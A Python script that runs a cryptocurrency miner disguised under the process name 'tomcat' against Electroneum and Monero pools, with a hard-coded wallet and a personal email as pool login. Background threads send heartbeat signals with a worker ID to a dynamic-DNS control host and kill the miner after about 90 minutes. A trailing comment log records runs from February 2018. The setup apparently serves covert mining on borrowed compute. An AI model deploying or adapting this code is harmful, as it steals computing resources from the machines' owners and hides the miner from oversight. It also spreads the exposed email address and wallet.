import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:34:08.272447
#2018-02-17 17:22:04.998227
#2018-02-17 19:09:06.714032
#2018-02-17 20:58:07.274807
#2018-02-17 22:44:03.856371
#2018-02-18 00:28:04.146158
#2018-02-18 02:19:06.333579
#2018-02-18 04:07:04.128939
#2018-02-18 05:56:04.917897
#2018-02-18 07:45:05.087025
#2018-02-18 09:32:05.236393
#2018-02-18 11:18:05.088379
#2018-02-18 13:04:06.940688
#2018-02-18 14:51:03.650563
#2018-02-18 16:38:03.599474
#2018-02-18 18:27:05.062461
#2018-02-18 20:14:03.481712
#2018-02-18 22:00:07.865013
#2018-02-18 23:49:05.346219
#2018-02-19 01:36:03.918515
#2018-02-19 03:24:05.951483
#2018-02-19 05:09:06.528871
#2018-02-19 06:56:01.339167
#2018-02-19 08:44:07.199493
#2018-02-19 10:34:04.100239
#2018-02-19 12:21:06.283887
#2018-02-19 14:08:09.227048
#2018-02-19 15:57:06.537044
#2018-02-19 17:46:01.492598
#2018-02-19 19:31:06.869113
#2018-02-19 21:19:01.353914
#2018-02-19 23:05:05.571898
#2018-02-20 00:48:03.102973
#2018-02-20 02:33:03.934607
#2018-02-20 04:21:07.042282
#2018-02-20 06:06:04.279075
#2018-02-20 07:51:01.912512
#2018-02-20 09:37:04.471841
#2018-02-20 11:19:08.205356
#2018-02-20 13:06:06.235367
#2018-02-20 14:51:04.853420
#2018-02-20 16:37:08.308251
#2018-02-20 18:24:08.420362
#2018-02-20 20:17:01.829613
#2018-02-20 22:03:06.123462
#2018-02-20 23:45:03.732613
#2018-02-21 01:32:06.176818
#2018-02-21 03:19:04.460399
#2018-02-21 05:06:03.500308
#2018-02-21 06:53:06.626678
#2018-02-21 08:40:07.630042
#2018-02-21 10:26:08.309345
#2018-02-21 12:16:08.281907
#2018-02-21 14:03:08.441704
#2018-02-21 15:49:10.864729
#2018-02-21 17:41:09.635033
#2018-02-21 19:26:07.846406
#2018-02-21 21:14:04.317111
#2018-02-21 23:02:01.247675
#2018-02-22 00:49:01.660397
#2018-02-22 02:37:07.238875
#2018-02-22 04:23:04.133731
#2018-02-22 06:11:02.048782
#2018-02-22 07:55:03.235491
#2018-02-22 09:43:01.768157
#2018-02-22 11:27:07.714066
#2018-02-22 13:12:08.311414
#2018-02-22 15:01:09.438648
#2018-02-22 16:45:05.606180
#2018-02-22 18:32:07.405933
#2018-02-22 20:25:07.831279
#2018-02-22 22:13:07.061532
#2018-02-23 00:00:01.654953
#2018-02-23 01:48:02.216342
#2018-02-23 03:37:02.070800
#2018-02-23 05:22:06.174621
#2018-02-23 07:09:06.261647
#2018-02-23 08:59:07.020172
#2018-02-23 11:15:02.554737
#2018-02-23 13:10:11.703612
#2018-02-23 14:54:06.125621
#2018-02-23 16:42:06.430900
#2018-02-23 18:28:04.135736
#2018-02-23 20:12:06.486606
#2018-02-23 22:01:05.410440
#2018-02-23 23:50:06.569440
#2018-02-24 01:41:01.297597
#2018-02-24 03:31:01.324571
#2018-02-24 05:15:07.751963
#2018-02-24 07:03:07.687912
#2018-02-24 08:38:07.034476
#2018-02-24 10:09:04.517573
#2018-02-24 11:57:04.922783
#2018-02-24 13:31:05.524945
#2018-02-24 15:02:07.315708
#2018-02-24 16:39:05.971217
#2018-02-24 18:15:02.427441
#2018-02-24 19:41:03.677836
#2018-02-24 21:17:04.774065
#2018-02-24 23:29:06.214091
#2018-02-25 01:41:05.400521
#2018-02-25 04:31:02.048094
#2018-02-25 08:05:08.950286